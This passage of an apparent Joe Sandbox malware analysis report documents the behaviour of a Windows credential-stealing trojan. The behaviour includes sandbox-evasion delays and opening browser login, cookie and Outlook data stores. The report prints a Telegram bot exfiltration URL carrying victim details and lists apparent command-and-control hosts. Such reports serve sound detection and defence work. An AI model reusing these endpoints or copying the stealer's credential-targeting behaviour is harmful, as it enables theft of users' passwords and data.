            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598265Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598156Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598047Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596826Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596703Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596593Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596373Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596265Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596046Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595937Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595718Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595061Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 594515Jump to behavior
            Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(5
            Source: C:\Users\user\Desktop\rFa24c148.exeAPI call chain: ExitProcess graph end nodegraph_0-4821
            Source: C:\Users\user\Desktop\rFa24c148.exeAPI call chain: ExitProcess graph end nodegraph_0-4815
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060E1
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeQueries volume information: C:\Users\user\Desktop\rFa24c148.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_00405D99 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405D99
            Source: C:\Users\user\Desktop\rFa24c148.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rFa24c148.exe PID: 7732, type: MEMORYSTR
            Source: C:\Users\user\Desktop\rFa24c148.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2993781136.0000000033547000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rFa24c148.exe PID: 7732, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rFa24c148.exe PID: 7732, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            11
            Process Injection
            12
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            rFa24c148.exe16%ReversingLabsWin32.Trojan.Garf
            rFa24c148.exe32%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            drive.usercontent.google.com1%VirustotalBrowse
            reallyfreegeoip.org0%VirustotalBrowse
            drive.google.com0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://checkip.dyndns.org0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.18.110
            truefalseunknown
            drive.usercontent.google.com
            142.250.185.225
            truefalseunknown
            reallyfreegeoip.org
            188.114.96.3
            truetrueunknown
            api.telegram.org
            149.154.167.220
            truetrue
              unknown
              checkip.dyndns.com
              193.122.6.168
              truefalse
                unknown
                checkip.dyndns.org
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2028/10/2024%20/%2012:44:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                    unknown
                    http://checkip.dyndns.org/false
                    • URL Reputation: safe
                    unknown
                    https://reallyfreegeoip.org/xml/155.94.241.188false
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.office.com/rFa24c148.exe, 00000004.00000002.2993781136.0000000033632000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://api.telegram.orgrFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://api.telegram.org/botrFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20arFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://www.office.com/lBrFa24c148.exe, 00000004.00000002.2993781136.000000003362D000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://drive.usercontent.google.com/rFa24c148.exe, 00000004.00000003.2145457011.0000000002E62000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2145385443.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2971357954.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://checkip.dyndns.orgrFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016rFa24c148.exe, 00000004.00000002.2993781136.0000000033547000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003470D000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347E2000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034569000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034590000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003451B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://nsis.sf.net/NSIS_ErrorErrorrFa24c148.exefalse
                                  • URL Reputation: safe
                                  unknown
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rFa24c148.exe, 00000004.00000002.2993781136.0000000033547000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003470D000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347E2000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034569000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.0000000034590000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003451B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://chrome.google.com/webstore?hl=enrFa24c148.exe, 00000004.00000002.2993781136.0000000033601000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://reallyfreegeoip.org/xml/155.94.241.188$rFa24c148.exe, 00000004.00000002.2993781136.00000000334FE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.00000000334B8000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://varders.kozow.com:8081rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://aborters.duckdns.org:8081rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.google.comrFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://drive.google.com/rFa24c148.exe, 00000004.00000002.2971357954.0000000002DB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://anotherarmy.dns.army:8081rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallrFa24c148.exe, 00000004.00000002.2994718005.0000000034521000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003469A000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003456B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000344F6000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347BE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://chrome.google.com/webstore?hl=enlBrFa24c148.exe, 00000004.00000002.2993781136.00000000335FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://reallyfreegeoip.orgrFa24c148.exe, 00000004.00000002.2993781136.000000003348E000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.00000000334FE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://apis.google.comrFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesrFa24c148.exe, 00000004.00000002.2994718005.0000000034521000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003469A000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.000000003456B000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000344F6000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000347BE000.00000004.00000800.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2994718005.00000000346C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://reallyfreegeoip.org/xml/rFa24c148.exe, 00000004.00000002.2993781136.000000003348E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    149.154.167.220
                                                    api.telegram.orgUnited Kingdom
                                                    62041TELEGRAMRUtrue
                                                    193.122.6.168
                                                    checkip.dyndns.comUnited States
                                                    31898ORACLE-BMC-31898USfalse
                                                    188.114.96.3
                                                    reallyfreegeoip.orgEuropean Union
                                                    13335CLOUDFLARENETUStrue
                                                    172.217.18.110
                                                    drive.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    142.250.185.225
                                                    drive.usercontent.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1543495
                                                    Start date and time:2024-10-28 02:01:06 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 11s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:6
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:rFa24c148.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@3/10@5/5
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 97%
                                                    • Number of executed functions: 185
                                                    • Number of non-executed functions: 145
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    TimeTypeDescription
                                                    21:02:48API Interceptor190220x Sleep call for process: rFa24c148.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    149.154.167.220PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      na.docGet hashmaliciousMassLogger RATBrowse
                                                        na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    SecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                                      Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        193.122.6.168na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        Factura 1-014685.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        EKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        reallyfreegeoip.orgna.docGet hashmaliciousMassLogger RATBrowse
                                                                        • 188.114.96.3
                                                                        na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.114.97.3
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.114.96.3
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.114.97.3
                                                                        mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.114.96.3
                                                                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 188.114.97.3
                                                                        JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 188.114.96.3
                                                                        dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 188.114.97.3
                                                                        Bank transfer receipt 241015.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 188.114.97.3
                                                                        Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 188.114.96.3
                                                                        checkip.dyndns.comna.docGet hashmaliciousMassLogger RATBrowse
                                                                        • 193.122.130.0
                                                                        na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 158.101.44.242
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 132.226.247.73
                                                                        mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 158.101.44.242
                                                                        JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 193.122.130.0
                                                                        dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 158.101.44.242
                                                                        Bank transfer receipt 241015.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 132.226.8.169
                                                                        Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 132.226.8.169
                                                                        api.telegram.orgPbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 149.154.167.220
                                                                        na.docGet hashmaliciousMassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 149.154.167.220
                                                                        Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        ORACLE-BMC-31898USna.docGet hashmaliciousMassLogger RATBrowse
                                                                        • 193.122.130.0
                                                                        na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 193.122.130.0
